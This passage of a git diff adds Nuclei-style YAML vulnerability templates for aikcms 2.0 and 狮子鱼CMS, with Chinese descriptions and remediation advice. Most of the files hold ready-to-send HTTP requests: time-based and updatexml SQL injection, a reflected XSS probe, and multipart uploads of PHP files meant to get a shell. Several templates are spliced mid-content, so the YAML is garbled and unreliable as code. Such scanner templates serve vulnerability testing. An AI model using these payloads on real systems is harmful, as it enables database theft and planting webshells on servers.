Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、升级Web Server。 + 10、及时修复Web上传代码。 + 11、不能有本地文件包含漏洞。 + 12、注意0x00截断攻击(PHP更新到最新版本)。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - contains(body,"c4ca4238a0b923820dcc509a6f75849b") + raw: + - | + GET /upload/abcdefg.php HTTP/1.1 + Host: {{Hostname}} + - | + POST /admin/page/system/admin.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuRi6L8CARrXKbCwD + + ------WebKitFormBoundaryuRi6L8CARrXKbCwD + Content-Disposition: form-data; name="aik_admin_img"; filename="abcdefg.php" + Content-Type: text/php + + &*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - (duration_2 - duration_1) > 2.5 + raw: + - | + GET /admin/page/video/videogroup_edit.php HTTP/1.1 + Host: {{Hostname}} + - | + GET /admin/page/video/videogroup_edit.php?id=3%20and%20if(1,sleep(3),1)%23 HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git "a/config/51pwn/yaml/\347\210\261\345\256\242CMS/CNVD-2019-17061.yaml" "b/config/51pwn/yaml/\347\210\261\345\256\242CMS/CNVD-2019-17061.yaml" new file mode 100755 index 000000000..b900c0656 --- /dev/null +++ "b/config/51pwn/yaml/\347\210\261\345\256\242CMS/CNVD-2019-17061.yaml" @@ -0,0 +1,29 @@ +id: CNVD-2019-17061 +info: + name: aikcms_2.0_ad_edit.php_时间盲注 + author: + - jim2g + description: |- + aikcms_2.0_ad_edit.php_存在时间盲注 + 爱客CMS是一款采用PHP + Mysql架构、多语言、响应式展示,适合个人网站建设的CMS建站系统。 + + 爱客CMS后台vi***.php存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。 + severity: high + remediation: "官方修复方案:\n1、建议用户到官方获取最新补丁或者最新版本程序:\nhttp://www.aikcms.com/ \n临时修复方案:\n1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。\n2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。\n3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。\n4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。\n5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。\n6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。\n7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。\n8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。\n" +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - (duration_2 - duration_1) > 2.5 + raw: + - | + GET /admin/page/union/ad_edit.php HTTP/1.1 + Host: {{Hostname}} + - | + POST /admin/page/union/ad_edit.php?id=5%20and%20if(1,sleep(3),1) HTTP/1.1 + Host: {{Hostname}} + + aik_ad_seat=%E6%90%9C%E7%B4%A2%E9%A1%B5%E5%8F%B3%E4%B8%8B&aik_ad_remarks=%E6%8C%96%E7%89%87%E6%A8%A1%E6%9D%BF&aik_ad_code=%3Ca++href%3D%22https%3A%2F%2Fs.click.taobao.com%2FokHmscw%22+target%3D%22_blank%22%3E%3Cimg+src%3D%22https%3A%2F%2Fs2.ax1x.com%2F2019%2F02%2F16%2Fks9ilt.jpg%22+style%3D%22width%3A100%25%3B%22%3E%3C%2Fa%3E&update= + req-condition: true diff --git "a/config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms-admin-page-getshell.yaml" "b/config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms-admin-page-getshell.yaml" new file mode 100755 index 000000000..9c393a661 --- /dev/null +++ "b/config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms-admin-page-getshell.yaml" @@ -0,0 +1,67 @@ +id: aikcms-admin-page-getshell +info: + name: aikcms_v2.0.0_admin_page_system_admin.php_文件上传getshell + author: + - jim2g + description: | + aikcms_v2.0.0_admin_page_system_admin.php_存在文件上传漏洞 + 在Web程序中,通常会涉及到一些文件上传的功能,如头像上传、图片上传、附件上传等,由于Web中间件会根据用户的请求去执行特定后缀的文件(asp、php、cgi、aspx、jsp等),如果在上传文件的功能中未限制上传文件的后缀,导致可以上传“asp、php、cgi、aspx、jsp、html”等后缀的执行文件时,那么攻击者可以利用此漏洞上传恶意的可执行文件来执行恶意的代码,比如文件读写、命令执行,这样即可直接控制服务器。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.aikcms.com/ + 临时修复方案: + 文件上传: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、升级Web Server。 + 10、及时修复Web上传代码。 + 11、不能有本地文件包含漏洞。 + 12、注意0x00截断攻击(PHP更新到最新版本)。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - contains(body,"c4ca4238a0b923820dcc509a6f75849b") + raw: + - | + GET /upload/abcdefg.php HTTP/1.1 + Host: {{Hostname}} + - | + POST /admin/page/system/link_add.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybPB6QBVnZ0dOHFhN + + ------WebKitFormBoundarybPB6QBVnZ0dOHFhN + Content-Disposition: form-data; name="aik_link_name" + + + ------WebKitFormBoundarybPB6QBVnZ0dOHFhN + Content-Disposition: form-data; name="aik_link_img" + + + ------WebKitFormBoundarybPB6QBVnZ0dOHFhN + Content-Disposition: form-data; name="aik_link_img"; filename="abcdefg.php" + Content-Type: text/php + + &*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - (duration_2 - duration_1) > 2.5 + raw: + - | + GET /admin/page/system/link_edit.php HTTP/1.1 + Host: {{Hostname}} + - | + POST /admin/page/system/link_edit.php?id=1%20and%20if(1,sleep(3),1) HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7oFL75gOdBB1Y9pr + Accept-Encoding: gzip, deflate + Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 + Connection: close + + ------WebKitFormBoundary7oFL75gOdBB1Y9pr + Content-Disposition: form-data; name="aik_link_name" + + + ------WebKitFormBoundary7oFL75gOdBB1Y9pr + Content-Disposition: form-data; name="aik_link_img" + + + ------WebKitFormBoundary7oFL75gOdBB1Y9pr + Content-Disposition: form-data; name="aik_link_img"; filename="" + Content-Type: application/octet-stream + + + ------WebKitFormBoundary7oFL75gOdBB1Y9pr + Content-Disposition: form-data; name="aik_link_qq" + + + ------WebKitFormBoundary7oFL75gOdBB1Y9pr + Content-Disposition: form-data; name="aik_link_url" + + http://www.xiaoerhu.com + ------WebKitFormBoundary7oFL75gOdBB1Y9pr + Content-Disposition: form-data; name="update" + + + ------WebKitFormBoundary7oFL75gOdBB1Y9pr-- + req-condition: true diff --git "a/config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms_v2-add-upload.yaml" "b/config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms_v2-add-upload.yaml" new file mode 100755 index 000000000..25b0beb82 --- /dev/null +++ "b/config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms_v2-add-upload.yaml" @@ -0,0 +1,70 @@ +id: aikcms_v2-add-upload +info: + name: aikcms_v2-admin-upload + author: + - jim2g + description: | + aikcms_v2.0.0_admin_page_user_usergroup_add.php_存在文件上传漏洞 + 在Web程序中,通常会涉及到一些文件上传的功能,如头像上传、图片上传、附件上传等,由于Web中间件会根据用户的请求去执行特定后缀的文件(asp、php、cgi、aspx、jsp等),如果在上传文件的功能中未限制上传文件的后缀,导致可以上传“asp、php、cgi、aspx、jsp、html”等后缀的执行文件时,那么攻击者可以利用此漏洞上传恶意的可执行文件来执行恶意的代码,比如文件读写、命令执行,这样即可直接控制服务器。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.aikcms.com/ + 临时修复方案: + 文件上传: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、升级Web Server。 + 10、及时修复Web上传代码。 + 11、不能有本地文件包含漏洞。 + 12、注意0x00截断攻击(PHP更新到最新版本)。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - contains(body,"c4ca4238a0b923820dcc509a6f75849b") + raw: + - | + GET /upload/abcdefg.php HTTP/1.1 + Host: {{Hostname}} + - | + POST /admin/page/user/usergroup_add.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVzozos3oNmflmv2B + + ------WebKitFormBoundaryVzozos3oNmflmv2B + Content-Disposition: form-data; name="aik_usergroup_name" + + + ------WebKitFormBoundaryVzozos3oNmflmv2B + Content-Disposition: form-data; name="aik_usergroup_img"; filename="abcdefg.php" + Content-Type: text/php + + &*;等)进行转义处理,或编码转换。\n3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。\n4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。\n5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。\n6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。\n7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。\n8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。\n" +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - (duration_2 - duration_1) > 2.5 + raw: + - | + GET /admin/page/video/videogroup_edit.php HTTP/1.1 + Host: {{Hostname}} + - | + GET /aikcms2.0/admin/page/video/videogroup_edit.php?id=3%20and%20if(1,sleep(3),1)%23 HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git "a/config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms_v2-nav-upload.yaml" "b/config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms_v2-nav-upload.yaml" new file mode 100755 index 000000000..aabf270f6 --- /dev/null +++ "b/config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms_v2-nav-upload.yaml" @@ -0,0 +1,58 @@ +id: aikcms_v2-nav-upload +info: + name: aikcms_v2.0.0_admin_page_system_link_edit.php_文件上传getshell + author: + - jim2g + description: | + aikcms_v2.0.0_admin_page_system_nav.php_存在文件上传漏洞 + 在Web程序中,通常会涉及到一些文件上传的功能,如头像上传、图片上传、附件上传等,由于Web中间件会根据用户的请求去执行特定后缀的文件(asp、php、cgi、aspx、jsp等),如果在上传文件的功能中未限制上传文件的后缀,导致可以上传“asp、php、cgi、aspx、jsp、html”等后缀的执行文件时,那么攻击者可以利用此漏洞上传恶意的可执行文件来执行恶意的代码,比如文件读写、命令执行,这样即可直接控制服务器。 + severity: high + remediation: "官方修复方案:\n1、建议用户到官方获取最新补丁或者最新版本程序:\nhttp://www.aikcms.com/ \n临时修复方案:\n文件上传:\n1、服务器端将文件上传目录直接设置为不可执行。\n2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME + Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。\n3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。\n4、单独设置文件服务器的域名。\n5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。\n6、修复服务器可能存在的解析漏洞。\n7、严格限制可以修改服务器配置的文件上传如:.htaccess。\n8、隐藏上传文件路径。\n9、升级Web + Server。\n10、及时修复Web上传代码。\n11、不能有本地文件包含漏洞。\n12、注意0x00截断攻击(PHP更新到最新版本)。\n" +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - contains(body,"c4ca4238a0b923820dcc509a6f75849b") + raw: + - | + GET /upload/abcdefg.php HTTP/1.1 + Host: {{Hostname}} + - | + POST /admin/page/system/nav.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1uj2tbj7FYhvvWm0 + + ------WebKitFormBoundary1uj2tbj7FYhvvWm0 + Content-Disposition: form-data; name="aik_biglogo" + + ../upload/logo.png + ------WebKitFormBoundary1uj2tbj7FYhvvWm0 + Content-Disposition: form-data; name="aik_biglogo"; filename="abcdefg.php" + Content-Type: text/php + + &*;等)进行转义处理,或编码转换。\n3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。\n4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。\n5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。\n6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。\n7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。\n8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。\n" +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - (duration_2 - duration_1) > 2.5 + raw: + - | + GET /admin/page/system/poster_edit.php HTTP/1.1 + Host: {{Hostname}} + - | + POST /admin/page/system/poster_edit.php?id=1%20and%20if(1,sleep(3),1) HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHfgAWm1rDzPrzFnc + Referer: http://rt95.test/aikcms2.0/admin/page/system/poster_edit.php?id=1 + + ------WebKitFormBoundaryHfgAWm1rDzPrzFnc + Content-Disposition: form-data; name="aik_hd_name" + + + ------WebKitFormBoundaryHfgAWm1rDzPrzFnc + Content-Disposition: form-data; name="aik_hd_img" + + /upload/shell.php + ------WebKitFormBoundaryHfgAWm1rDzPrzFnc + Content-Disposition: form-data; name="aik_hd_img"; filename="" + Content-Type: application/octet-stream + + + ------WebKitFormBoundaryHfgAWm1rDzPrzFnc + Content-Disposition: form-data; name="aik_hd_link" + + tao.uuhuo.cn + ------WebKitFormBoundaryHfgAWm1rDzPrzFnc + Content-Disposition: form-data; name="update" + + + ------WebKitFormBoundaryHfgAWm1rDzPrzFnc-- + req-condition: true diff --git "a/config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms_v2-xss.yaml" "b/config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms_v2-xss.yaml" new file mode 100755 index 000000000..10eb01258 --- /dev/null +++ "b/config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms_v2-xss.yaml" @@ -0,0 +1,27 @@ +id: aikcms_v2-xss +info: + name: aikcms_v2.0.0_index.php_xss + author: + - jim2g + description: | + aikcms_v2.0.0_index.php存在跨站脚本漏洞 + XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。\n反射型XSS,是最普遍的类型。用户访问服务器-跨站链接-返回跨站代码,它的特点是非持久化,必须用户点击带有特定参数的链接才能引起。 + severity: high + remediation: "官方修复方案:\n1、建议用户到官方获取最新补丁或者最新版本程序:\nhttp://www.aikcms.com/ \n临时修复方案:\n1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。'\n" +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"") + raw: + - | + GET /index.php?mode=search&wd= HTTP/1.1 + Host: {{Hostname}} + - | + POST /admin/page/union/ad_edit.php?id=5%20and%20if(1,sleep(3),1) HTTP/1.1 + Host: {{Hostname}} + + aik_ad_seat=%E6%90%9C%E7%B4%A2%E9%A1%B5%E5%8F%B3%E4%B8%8B&aik_ad_remarks=%E6%8C%96%E7%89%87%E6%A8%A1%E6%9D%BF&aik_ad_code=%3Ca++href%3D%22https%3A%2F%2Fs.click.taobao.com%2FokHmscw%22+target%3D%22_blank%22%3E%3Cimg+src%3D%22https%3A%2F%2Fs2.ax1x.com%2F2019%2F02%2F16%2Fks9ilt.jpg%22+style%3D%22width%3A100%25%3B%22%3E%3C%2Fa%3E&update= + req-condition: true diff --git "a/config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms_v2_notice_edit_sqli.yaml" "b/config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms_v2_notice_edit_sqli.yaml" new file mode 100755 index 000000000..682c91aa5 --- /dev/null +++ "b/config/51pwn/yaml/\347\210\261\345\256\242CMS/aikcms_v2_notice_edit_sqli.yaml" @@ -0,0 +1,52 @@ +id: aikcms_v2_notice_edit_sqli +info: + name: aikcms_2.0_notice_edit.php_时间盲注 + author: + - jim2g + description: | + aikcms_2.0_notice_edit.php_存在时间盲注 + 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.aikcms.com/ + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - (duration_2 - duration_1) > 2.5 + raw: + - | + GET /admin/page/user/notice_edit.php HTTP/1.1 + Host: {{Hostname}} + - | + POST /admin/page/user/notice_edit.php?id=1%20and%20if(1,sleep(3),1) HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXLYuClHc0fZFSeK8 + + ------WebKitFormBoundaryXLYuClHc0fZFSeK8 + Content-Disposition: form-data; name="aik_notice_title" + + ------WebKitFormBoundaryXLYuClHc0fZFSeK8 + Content-Disposition: form-data; name="aik_notice_url" + + http://tao.uuhuo.cn + ------WebKitFormBoundaryXLYuClHc0fZFSeK8 + Content-Disposition: form-data; name="update" + + + ------WebKitFormBoundaryXLYuClHc0fZFSeK8-- + req-condition: true diff --git "a/config/51pwn/yaml/\347\213\256\345\255\220\351\261\274/shiziyu-ApigoodsController-sqlinjection.yaml" "b/config/51pwn/yaml/\347\213\256\345\255\220\351\261\274/shiziyu-ApigoodsController-sqlinjection.yaml" new file mode 100755 index 000000000..868e768f2 --- /dev/null +++ "b/config/51pwn/yaml/\347\213\256\345\255\220\351\261\274/shiziyu-ApigoodsController-sqlinjection.yaml" @@ -0,0 +1,33 @@ +id: shiziyu-ApigoodsController-sqlinjection +info: + name: 狮子鱼CMS ApigoodsController.class.php SQL注入漏洞 + author: + - zxcv + tags: + - sqlinjection + - shiziyu + description: |- + 狮子鱼CMS ApigoodsController.class.php SQL注入漏洞 + 狮子鱼CMS ApigoodsController.class.php 参数过滤存在不严谨,导致SQL注入漏洞 + severity: high + metadata: + fofa-query: /seller.php?s=/Public/login + verified: true + remediation: 升级至最新版本 +requests: +- matchers: + - type: word + part: body + words: + - 'XPATH syntax error: ''~' + - '{{verify}}' + - type: status + status: + - 404 + matchers-condition: and + path: + - '{{BaseURL}}/index.php?s=apigoods/get_goods_detail&id=1%20and%20updatexml(1,concat(0x7e,md5({{number}}),0x7e),1)' + method: GET +variables: + number: '{{rand_int(1, 100)}}' + verify: '{{md5({{number}})}}' diff --git "a/config/51pwn/yaml/\347\213\256\345\255\220\351\261\274/shiziyu-apicontroller-sqlinjection.yaml" "b/config/51pwn/yaml/\347\213\256\345\255\220\351\261\274/shiziyu-apicontroller-sqlinjection.yaml" new file mode 100755 index 000000000..3bd525031 --- /dev/null +++ "b/config/51pwn/yaml/\347\213\256\345\255\220\351\261\274/shiziyu-apicontroller-sqlinjection.yaml" @@ -0,0 +1,33 @@ +id: shiziyu-apicontroller-sqlinjection +info: + name: 狮子鱼CMS ApiController.class.php SQL注入漏洞 + author: + - zxcv + tags: + - sqlinjection + - shiziyu + description: |- + 狮子鱼CMS ApiController.class.php SQL注入漏洞 + 狮子鱼CMS ApiController.class.php 参数过滤存在不严谨,导致SQL注入漏洞 + severity: high + metadata: + fofa-query: /seller.php?s=/Public/login + verified: true + remediation: 升级至最新版本:http://www.shiziyu.net/gnzs/ +requests: +- matchers: + - type: word + part: body + words: + - 'XPATH syntax error: ''~' + - '{{verify}}' + - type: status + status: + - 404 + matchers-condition: and + path: + - '{{BaseURL}}/index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,md5(233),0x7e),1)' + method: GET +variables: + number: '{{rand_int(1, 100)}}' + verify: '{{md5({{number}})}}' diff --git "a/config/51pwn/yaml/\347\213\256\345\255\220\351\261\274/shiziyu-image_upload-fileupload.yaml" "b/config/51pwn/yaml/\347\213\256\345\255\220\351\261\274/shiziyu-image_upload-fileupload.yaml" new file mode 100755 index 000000000..1f5ccb6f3 --- /dev/null +++ "b/config/51pwn/yaml/\347\213\256\345\255\220\351\261\274/shiziyu-image_upload-fileupload.yaml" @@ -0,0 +1,59 @@ +id: shiziyu-image_upload-fileupload +info: + name: 狮子鱼CMS image_upload.php 任意文件上传漏洞 + author: + - zxcv + tags: + - fileupload + - shiziyu + description: |- + 狮子鱼CMS image_upload.php 任意文件上传漏洞 + 狮子鱼CMS使用CK编辑器,存在图片上传的绕过,造成 image_upload.php 任意文件上传。 + severity: high + metadata: + fofa-query: /seller.php?s=/Public/login + verified: true + remediation: 升级至最新版本 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1 == 200 + - contains(body_1, "{\"result\":\"200\",\"imgurl\":\"image/uploads") + - status_code_2==200 + - contains(body_2, "PHP Version") + extractors: + - name: uploadFile + type: regex + regex: + - '"result":"200","imgurl":"(.+\.php)"' + group: 1 + part: body + internal: true + raw: + - | + POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 + Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 + Accept-Encoding: gzip, deflate + Content-Type: multipart/form-data; boundary=---------------------------395196955720873782481927711505 + Content-Length: 255 + Connection: close + Cookie: PHPSESSID=2pghk16kb7ad240mdt3satr1d2 + Upgrade-Insecure-Requests: 1 + Sec-Fetch-Dest: document + Sec-Fetch-Mode: navigate + Sec-Fetch-Site: cross-site + Sec-Fetch-User: ?1 + + -----------------------------395196955720873782481927711505 + Content-Disposition: form-data; name="files"; filename="aa.php" + Content-Type: image/gif + + + -----------------------------395196955720873782481927711505-- + - "GET /Common/{{uploadFile}} HTTP/1.1\nHost: {{Hostname}} \n" + req-condition: true diff --git "a/config/51pwn/yaml/\347\213\256\345\255\220\351\261\274/shiziyu-wxapp-fileupload.yaml" "b/config/51pwn/yaml/\347\213\256\345\255\220\351\261\274/shiziyu-wxapp-fileupload.yaml" new file mode 100755 index 000000000..8ede82b5e --- /dev/null +++ "b/config/51pwn/yaml/\347\213\256\345\255\220\351\261\274/shiziyu-wxapp-fileupload.yaml" @@ -0,0 +1,60 @@ +id: shiziyu-wxapp-fileupload +info: + name: 狮子鱼CMS wxapp.php 任意文件上传漏洞 + author: + - zxcv + tags: + - fileupload + - shiziyu + description: |- + 狮子鱼CMS wxapp.php 任意文件上传漏洞 + 狮子鱼CMS wxapp.php文件 存在任意文件上传漏洞,攻击者在没有身份验证的情况下可以上传恶意文件 + severity: high + metadata: + fofa-query: /seller.php?s=/Public/login + verified: true + remediation: 升级至最新版本 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1 == 200 + - contains(body_1, "image_thumb") + - status_code_2==200 + - contains(body_2, "PHP Version") + extractors: + - name: uploadFile + type: regex + regex: + - image_o_full":.+Uploads\\/image\\/goods\\/(.+)\.php"\} + group: 1 + part: body + internal: true + raw: + - | + POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 + Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 + Accept-Encoding: gzip, deflate + Content-Type: 